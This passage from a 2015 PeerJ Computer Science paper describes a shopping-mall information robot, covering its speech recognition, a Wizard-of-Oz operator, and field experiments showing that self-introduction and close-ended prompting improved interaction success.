http://dx.doi.org/10.7717/peerj-cs.8 People tracking We use a people tracking method described in Brscic et al. (2013), which provides an estimation of the location of pedestrians every 33 ms. It covers the square we used. There are 49 3-D range sensors attached on the ceiling (combination of Panasonic D-Imager, ASUS Xtion, and Velodyne HDL-32E). Localization For robot localization, we use a particle filter with a ray tracing approach on a grid map (Fox, Burgard & Thrun, 1999). The grid map is built from odometry and laser scanner data. This module is called every 350 ms and updates the robot’s position. Speech recognition (with human operator) We developed fully-autonomous system using ASR (automatic speech recognition), but in order to better test the overall framework we used a human operator instead of ASR. Automatic speech recognition (ASR). We used an ASR software, ATRASR (Matsuda et al., 2006). It uses a language model based on FSA (Finite State Automaton). We constructed the language model mainly using the terms appeared in the ontology. With preliminary trials using the Wizard-of-Oz approach, we analyzed the way visitors speak to the robot. In total, 470 requests collected over 3 days of preliminary trials. From the analysis of the requests, we found that they mainly follow three ways of speaking, as follows: • Noun/adjectives only: People only spoke words like a name (nickname) of location, category, or item name, such as “restaurant,” and “coffee.” Sometimes, for features and people’s activity, they add such terms like “place for” (eat/lunch/play). Some ontology items are adjectives, such as “tired.” People sometimes only spoke such adjectives. • “Where is” question: The above noun is used in “where is” question, such as “where is Kaika-ya (the name of restaurant) ?” • “I would like to” sentence: People also use the form of “I would like to” + “verb” + “noun” in requesting sentences, such as “I would like to buy coffee.” For all names, nicknames, and requestable properties, we automatically generated grammatical structures for ASR. Further, we added the following grammars. First, some basic verbs like “go” can be used in “I would like to” type sentences but were not included in the ontology (as they by themselves does not represent any specific request), which we manually added (8 verbs). Second, we added filler words, such as “well,” “ah,” that appear in advance to questions (12 words). Third, to eliminate noises from environments, like sounds from people’s walking, whistle from ships, we added some fillers (66 fillers). Overall, we prepared the lexicon whose size is 1,469 with 4,938 links. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 12/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 The ASR outputs the matched names, nicknames, or requestable properties, which are used in the dialog manager to determine the answer to be provided. In case the ASR detects the recognition to be less reliable (because the input does not match well with its language model), the dialog manager prompts the user to say again with utterances like “could you repeat please?” The ASR is deactivated while the robot is speaking. We evaluated the system performance using this ASR implementation. We put the robot on a square of the mall (Fig. 3B), and let the visitors freely use it. With our preliminary test, with 22 users, there are 81 requests, for which the robot was only able to correctly respond in 19.8% of the cases. (In a similar study only 21.3% of successful recognition was achieved Matsuda et al., 2006.) There were 4 types of errors: error in sound detection error (due to other ambient sounds, the system failed to detect the start of utterance) (17.3%), ASR resulted in low reliability score (30.9%), utterance did not match with the prepared grammar/vocabulary (2.47%), and mis-recognition in ASR (29.6%). In case the mis-recognition occurred, often the system seemed to be interfered by ambient noise, which was matched with some vocabulary in the lexicon. In contrast, in case ASR successfully detected the names, nicknames, or requestable properties, the system provided appropriate answers. Overall, this preliminary test revealed that the system is capable of handling users’ utterances when the ASR is successful, while we would yet need to wait ASR technologies to be ready for real world environments. Wizard-of-Oz. The system is ready for autonomous speech recognition. But, for this study, to focus on other parts of interaction rather than working for errors in speech recognition, we used a human operator only to support speech recognition. We strictly limit the task of the operator, and have him work like the dumb ASR software described in the previous section. We did not allow the operator to add his knowledge. Just like the output from the ASR, the operator only typed the words spoken by the user. For instance, to our knowledge, if a user asks for a “Place for lunch” but such wording is not in the system vocabulary, in previous studies Wizard-of-Oz operators replaced such words to the ones system can handle, like “restaurant”; by doing so, the system can work with a very limited vocabulary and knowledge. Instead, with our system, a novice person who does not know the environment (e.g., list of shops) can easily serve as an operator. PRELIMINARY TRIALS: LACK OF ‘KNOWLEDGE’ FOR INTERACTION We conducted a preliminary study with the system reported in the previous section. We initially intended to supplement missing data and evaluate its performance. We found the system itself worked well (we will report in section ‘Evaluation of system performance’); however, interaction failed in other parts we did not think about. That is, some visitors responded in an unexpected way. In short, until this study was conducted, we focused on the ‘information’ aspect, which we found to be satisfyingly prepared, but we found a problem in ‘interaction.’ Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 13/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 6 The interaction failed because the visitor did not speak. Figure 7 The visitor kept silent after prompted. Here, we report two typical cases of failures. From these cases of failures, with a trial-and-error approach, we seek the reason why interaction fails and seek for better pattern of interaction for the problem. Finally, we generate hypotheses about missing knowledge in interaction (to be reported in the next section). Case 1: Interaction did not start The initial version of the robot imitated the interaction of human information staff. It waited for the arrival of the visitors, and waited for them to make a request. This is what a human staff member would do. The signboard showing ‘information staff ’ on the chest of the robot was very visible, so we expected that every visitor would have common expectations as those investigated in section ‘Expectations from information robot.’ However, frequently people would stay in front of the robot without saying anything. Figure 6 shows one of such cases. A man stopped in front of the robot, and the robot was ready to receive a request, orienting its body and head toward him; but, without talking to it, he moved to a side of the robot, and the robot followed. He moved back, and it followed again. Finally, he left after 30 s of silence. Case 2: Passive visitors Further, we noticed that the conversation got stuck when it asked for a request, even though the user initially spoke to the robot. For instance, Fig. 7 shows a visitor who engaged in greeting, but came to be silent when prompted to ask request. She left after 5 s of silence after being prompted. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 14/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 We interpreted that such people do not have concrete requests in their mind, thus they were stuck when asked to offer requests. FIELD EXPERIMENT For each case of problems found in the preliminary trial (reported in the previous section), we generated a hypothesis, and conducted an experiment to confirm our idea to supplement such weakness. The study protocol was approved by institutional review boards of Advanced Telecommunications Research Instituted International with reference number 14-502-2. Experiment 1 Hypothesis We initially replicated the way human staff interact with visitors. That is, we make it clear that the robot is serving as information staff. Assuming that visitors have the common expectations the purpose of information staff we let the robot wait for a visitor to make a request, and to prompt to request if not asked. However, this assumption was not always correct. Visitors may not share or may be unsure about their expectations of the ‘information robot’ role. If this is the case, we can probably moderate the problem by letting the robot first explain its role (direction giving and recommendation). Thus, we made the following prediction: Prediction 1: If the robot proactively explains its role as information staff, people will more frequently request information from it. Participants The study was conducted during weekends. The participants were visitors of the shopping mall who are typically group of friends and families who come to the mall for leisure. The mall is big and the layout is complicated, thus people are often in real need of getting directions from someone. When a robot is placed on the mall, people sometimes stopped at the robot. We assumed that such people who stopped at the robot as the participants. Condition There are two conditions compared. - With self-introduction: when a person stops, the robot starts self-introduction. It says, “Hello, I can provide directions and recommendations.” Then, it prompts him/her to request “May I provide you some information?” - Without self-introduction: when a person stops, the robot waits him/her to request without speaking to the user. In both conditions, when a visitor requests it immediately moves into the information dialog. After 20 s of silence, the robot closed the interaction saying “bye-bye.” Procedure The robot was placed at a square of the mall (Fig. 3B). We choose this location because visitors often arrive from the nearby escalator, and need direction giving around this Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 15/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 location. The study was conducted during daytime on weekends. We prepared six pairs of 25-minutes time slots. For each pair, two conditions were assigned. Between the slots, we put 5-minutes break, so that visitors are not influenced by the adjacent time slot. The visitors of the mall were able to freely interact with the robot. There was a signboard showing ‘information staff ’ on the frontal side of the robot, which was clearly visible to the visitors. Beyond that, there were no restrictions nor instructions provided to visitors. There was a person ensuring safety, but he stayed behind a column so that his presence was hardly noticeable from pedestrians. In such circumstances, we observed the pedestrians’ natural reaction to the robot. Measurement Considering the role of the information staff, we define the success of the interaction as follows: Success: The case where the robot was able to receive a request and offered appropriate information/service. We coded the success from the recorded video. Note that we only evaluated people who stopped in front of the robot (more than 3 s) and faced towards it; we consider that letting people stop is beyond the scope of this paper. If the same person interacted multiple times, only the first one was evaluated. Further, we only evaluated one participant per group (i.e., only the first member of the group, who stopped and faced the robot, was counted as our participant), so that the experiment would not suffer from other members’ prior interactions. Result In total, there were 238 interactions evaluated, which were coded by two coders who did not know the study hypothesis. One coded the whole data and the second one did confirmatory coding for 10% of the data. Their coding results matches well (kappa coefficient .962). Figure 8 shows the result of the study. There were 69.0% of the successful interactions in the with self-introduction condition, while 54.4% in the without self-introduction condition. Typical failure was, like the one shown in Fig. 6, when visitors stayed in front of the robot but remained silent even if they were prompted to talk to the robot. Some visitors left in the middle of the conversation, and some explicitly said they did not need service (6 cases in with self-introduction condition). We applied a Chi-square test to evaluate the ratio of success against failures. There is a significant difference between the conditions (χ 2(1) = 4.755, p < .05, ϕc = .141). Thus, prediction 1 was confirmed. When the robot provides self-introduction, the interactions ended with success more frequently. We interpret that even though the robot serves an ‘information’ role, people should share a common expectation. Unless it explains its role, some people might fail in using it. Discussion It is plausible that there are two sources of failure addressed. One is the belief that the robot can talk to them; another is the expectation that it offers information. We mainly argued Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 16/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 8 Result of the experiment 1. the second point, but it simultaneously offered help for the first element. Thus, one would argue that it is better to compare with a robot that only speaks to users but does not provide self-introduction. However, it was not easy to prepare such a condition when the robot only shows the capability that it can talk in the context of information service. For instance, if it only greeted people, visitors might expect it to engage in variety of interactions, but in reality the robot can only react for the ‘information’ role. Thus, although the effect would be due to both elements, we conducted the study in such a way. It remains as an open question what is the best length of self-introduction. We could make it short and only imply its task by saying something like “May I help you?” We consider that to our observation, people did not get bored due to length of the self-introduction and thus it could be considered as reasonable. Experiment 2 Hypothesis In the experiment 1, we found that self-introduction moderated the problem of failure; yet, interaction failed for about 30% of the visitors. We hypothesized that there are visitors who initiated interaction out of curiosity, without a concrete request in mind. Such people would be stuck when a robot prompts them for a request in a direct way. We hypothesized that we can moderate this problem, if the robot turns its offer into a question that they can easily answer. Thus, we made the following prediction: Prediction 2: If the robot prompts a user for a request in a way of questions they can easily answer, people will more frequently make requests to the information robot. Participants The same procedure was used as in experiment 1. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 17/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 9 Result of the experiment 2. Condition There are two conditions compared. In both conditions, when a person stops, the robot starts with a self-introduction, saying “Hello, I can provide directions and recommenda- tions.” This is identical to the wording used in experiment 1. After a short pause, the robot utters “I will give recommendations based on the locations you are going to,” and prompts the user to ask. The prompting utterance differs depending on the following condition: - Open-ended prompting: It prompts the user by saying “What kind of recommendation do you wish?” - Close-ended prompting: It prompts the user by saying “Where are you going?” In both conditions, whenever a visitor requests something to the robot, it immediately moves into the information dialog. If the user keeps silent for 8 s, it once repeats the prompting utterance. If there were 20 s of silence after the prompting utterance, the robot closed the interaction saying “bye-bye.” Procedure The same procedure was used as in experiment 1. We prepared seven pairs of 25-minutes time slots. Measurement The same measurement was used as in experiment 1. Result In total, there were 205 interactions evaluated, which were coded by two coders who do not know the study hypothesis. One coded the all data and second one did confirmatory coding for 10% of the data. Their coding results matches well (kappa coefficient .936). Figure 9 shows the result of the study. There were 84.5% of successful interactions in close-ended prompting condition and 69.4% in open-ended prompting condition. Similar to the experiment 1 failure cases, some visitors kept silent when prompted, some visitors left Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 18/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 in the middle, and some explicitly said they did not need the service (3 cases in close-ended prompting condition). We applied a Chi-square test to evaluate the ratio of success against failures. There is a significant difference between the conditions (χ 2(1) = 5.678, p < .05, ϕc = .166). The prediction 2 was consequently confirmed. When the robot’s prompting was close-ended, the interaction was more frequently successful than open-ended prompting. We interpret that as predicted many visitors did not have requests in mind and got stuck when asked to request; instead, if the robot offered a prompting utterance that invited the user to talk about what they know (e.g., their destination), it will more easily continue the dialog and offer information requested by the user. Discussion There are some open questions remaining. One would argue that those who kept silent are people who did not want to ‘hear’ the information, thus they did not respond to ‘hear’ questions in close-ended prompting. It is possible that they did not have that much will to spontaneously ask the robot to provide information; nevertheless, in open-ended prompting condition, people who were coded as success stayed until the robot finished providing information. One would also argue that the robot could anyway give information even if visitors kept silent. This is possible, and maybe the robot should do so for the remaining 15.5% of people. Our assumption is that it is probably better if they hear information they requested, rather than randomly chosen information. We could not fully clarify why the remaining 15.5% of people who kept quiet in close-ended condition. We tried to interview such people, but they did not want to be interviewed. Evaluation of system performance Throughout the experiment 1 and 2, the robot was controlled with the system reported in ‘System’. In total, there were 435 requests made for the information robot. We analyzed how they were handled, and evaluated whether the robot’s responses were correct. 66.8% of the case requests were a name of location and 4.0% were a nickname. In the other cases, these requests were turned into requestable properties: there were 4.4% item name, 14.6% category, 7.2% feature, 2.5% people activity, and 0.4% people’s state. In 78.6% of cases, the system provided direction-giving service, and 21.4% recommendation service. The appropriateness was evaluated by coders who do not know the study hypothesis. They judged based on the following criteria: Correct: the information the user requested is included and correct in the response from the robot. For instance, when a user asked “Are there Japanese restaurants?” the coder judged whether the robot provided the information about any Japanese restaurant (if any), and whether the provided information is correct. There coding results show moderate matching (kappa coefficient was .481). There were 96.6% of cases judged as correct. Incorrect cases were caused by the lack of nickname (8 cases), users who left before information was provided (3 cases), operator’s mistype (3 cases), and complex requests which the system was unable to handle Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 19/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 10 A scene of correct and successful interaction. (1 case). Overall, we believe that the system was able to cover the requests from users reasonably well. Figure 10 shows one of example of scene of interaction where the robot provided correct information. She asked a ‘where’ question using the name of a furniture shop, which was matched with the location entity instance of the furniture shop. Thus, the robot provided the direction to the shop while pointing the direction. She listened to the direction while looking at the robot. When the robot pointed, she looked at the pointed direction. Finally, she said “Thank you!” to the robot, and walked to the pointed direction. Figure 11 shows a scene where visitors’ requests were based on their physical state. They only said, “I’m hungry.” The robot was able to associate it to restaurants, so it recommended ramen restaurant. They requested it to provide directions to the restaurant, and the robot pointed the direction end explained the route. Overall, the system worked reasonably well. LIMITATION The content of knowledge can be local to the specific environment, robot, language, culture, and so on. The common sense about what the information service is would differ across cultures. Thus, if our study results were to be applied somewhere else, although we believe that most of the framework and structure of knowledge is pertinent, we would probably need to carefully adjust the knowledge. For instance, it is plausible that people in other cultures would inquire information with a different form. Knowledge about interaction would also differ. People in other cultures can be more or less open, active, hesitate, and/or curious, thus the effectiveness of such strategy can be different. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 20/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 11 Request made based on visitors’ state. CONCLUSION We investigated the knowledge relevant to information robot. First, we confirmed that what visitors expect for an information robot well overlapped with what human information staff do. We developed a knowledge representation for information robot. Our field study confirmed the knowledge representation was useful. When users requested, the robot was able to provide information with 96.6% of success. However, it also revealed that many people did not behave in the same way as they did with human staff. Our initial version of interaction flow only allowed 55.4% of success in providing information, while visitors in failure kept silent during the interaction. Through our field experiments, we found that some people need the robot to provide self-introduction about its role, and some people need close-ended prompting, i.e., letting users talk about what they know to make a request, instead of letting them generate a request. Finally, the robot was able to provide information for 84.5% of visitors. What we changed might be subtle, yet it changed the results quite a bit. ACKNOWLEDGEMENTS We thank the staff of the ATC shopping mall for their support. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Japan Science and Technology Agency (JST) and its CREST program. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 21/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 The following grant information was disclosed by the authors: Japan Science and Technology Agency (JST). CREST. Competing Interests Takyuki Kanda is an Academic Editor for PeerJ Computer Science. Satoru Satake, Keita Nakatani, Kotaro Hayashi, and Takyuki Kanda are employees of Intelligent Robotics and Communication Laboratories (IRC), Advanced Telecommunications Research Institute International (ATR). Author Contributions • Satoru Satake conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • Keita Nakatani performed the experiments, analyzed the data, prepared figures and/or tables. • Kotaro Hayashi performed the experiments, prepared figures and/or tables. • Takyuki Kanda conceived and designed the experiments, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • Michita Imai contributed reagents/materials/analysis tools. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The study protocol was approved by institutional review boards of Advanced Telecom- munications Research Instituted International with reference number 14-502-2. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.8#supplemental-information. REFERENCES Brscic D, Kanda T, Ikeda T, Miyashita T. 2013. Person tracking in large public spaces using 3d range sensors. IEEE Transaction on Human-Machine Systems 43:522–534 DOI 10.1109/THMS.2013.2283945. Cassell J, Stocky T, Bickmore T, Gao Y, Nakano Y, Ryokai K, Tversky D, Vaucelle C, Vilhjálmsson H. 2002. Mack: media lab autonomous conversational kiosk. In: Proceedings of IMAGINA, vol. 2, 12–15. Available at http://alumni.media.mit.edu/∼tstocky/pubs/Cassell.Stocky Imagina02.pdf. Daniel M-P, Tom A, Manghi E, Denis M. 2003. Testing the value of route directions through navigational performance. Spatial Cognition & Computation 3:269–289 DOI 10.1207/s15427633scc0304 2. Fox D, Burgard W, Thrun S. 1999. Markov localization for mobile robots in dynamic environments. Journal of Artificial Intelligence Research 11:391–427. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 22/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.7717/peerj-cs.8#supplemental-information http://dx.doi.org/10.1109/THMS.2013.2283945 http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://alumni.media.mit.edu/~tstocky/pubs/Cassell.Stocky_Imagina02.pdf http://dx.doi.org/10.1207/s15427633scc0304_2 http://dx.doi.org/10.7717/peerj-cs.8 Gross H-M, Boehme H, Schroeter C, Mueller S, Koenig A, Einhorn E, Martin C, Merten M, Bley A. 2009. Toomas: interactive shopping guide robots in everyday use—final implementation and experiences from long-term field trials. In: IEEE/RSJ international conference on intelligent robots and systems (IROS2009). Piscataway: IEEE, 2005–2012. Kanda T, Shiomi M, Miyashita Z, Ishiguro H, Hagita N. 2009. An affective guide robot in a shopping mall. In: ACM/IEEE international conference on human–robot interaction (HRI2009). Piscataway: IEEE, 173–180. Kobayashi Y, Shibata T, Hoshi Y, Kuno Y, Okada M, Yamazaki K. 2010. Choosing answerers by observing gaze responses for museum guide robots. In: ACM/IEEE international conference on human–robot interaction (HRI2010). Piscataway: IEEE, 109–110. Kollar T, Tellex S, Roy D, Roy N. 2010. Toward understanding natural language directions. In: ACM/IEEE international conference on human–robot interaction (HRI2010). Piscataway: IEEE, 259–266. Kopp S, Tepper PA, Ferriman K, Striegnitz K, Cassell J. 2008. Trading spaces: how humans and humanoids use speech and gesture to give directions. In: Nishida T, ed. Conversational informatics: an engineering approach. Chichester: John Wiley & Sons, 133–160. Matsuda S, Jitsuhiro T, Markov K, Nakamura S. 2006. Atr parallel decoding based speech recognition system robust to noise and speaking styles. IEICE Transactions on Information and Systems E89-D:989–997 DOI 10.1093/ietisy/e89-d.3.989. McGuinness DL, Van Harmelen F (eds.) 2004. Owl web ontology language overview, W3C Recommendation. Available at http://www.w3.org/TR/owl-features/. Morales Y, Satake S, Kanda T, Hagita N. 2011. Modeling environments from a route perspective. In: ACM/IEEE international conference on human robot interaction (HRI2011). Piscataway: IEEE, 441–448. Mutlu B, Forlizzi J, Hodgins J. 2006. A storytelling robot: modeling and evaluation of human-like gaze behavior. In: IEEE-RAS international conference on humanoid robots (Humanoids’06). Piscataway: IEEE, 518–523. Okuno Y, Kanda T, Imai M, Ishiguro H, Hagita N. 2009. Providing route directions: design of robot’s utterance, gesture, and timing. In: ACM/IEEE international conference on human–robot interaction (HRI2009). Piscataway: IEEE, 53–60. Ono T, Imai M, Ishiguro H. 2001. A model of embodied communications with gestures between humans and robots. In: Annual meeting of the cognitive science society (CogSci2001). Palo Alto: AAAI, 732–737. Available at http://conferences.inf.ed.ac.uk/cogsci2001/pdf-files/0732.pdf. Rich C, Ponsler B, Holroyd A, Sidner CL. 2010. Recognizing engagement in human–robot interaction. In: ACM/IEEE international conference on human–robot interaction (HRI2010). Piscataway: IEEE, 375–382. Sidner CL, Kidd CD, Lee C, Lesh N. 2004. Where to look: a study of human–robot engagement. In: International conference on intelligent user interfaces (IUI 2004). New York: ACM, 78–84. Sidner CL, Lee C, Lesh N. 2003. Engagement by looking: behaviors for robots when collaborating with people. In: Kruiff-Korbayova, Kosny, eds. DiaBruck: the proceedings of the seventh workshop on the semantics and pragmatics of dialogue. Saarbrücken: Saarland University, 123–130. Thrun S, Bennewitz M, Burgard W, Cremers AB, Dellaert F, Fox D, Hahnel D, Rosenberg C, Roy N, Schulte J, Schulz D. 1999. Minerva: a second-generation museum tour-guide robot. In: IEEE international conference on robotics and automation (ICRA1999). Piscataway: IEEE, 1999–2005. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 23/23 https://peerj.com/computer-science/ http://dx.doi.org/10.1093/ietisy/e89-d.3.989 http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ http://www.w3.org/TR/owl-features/ 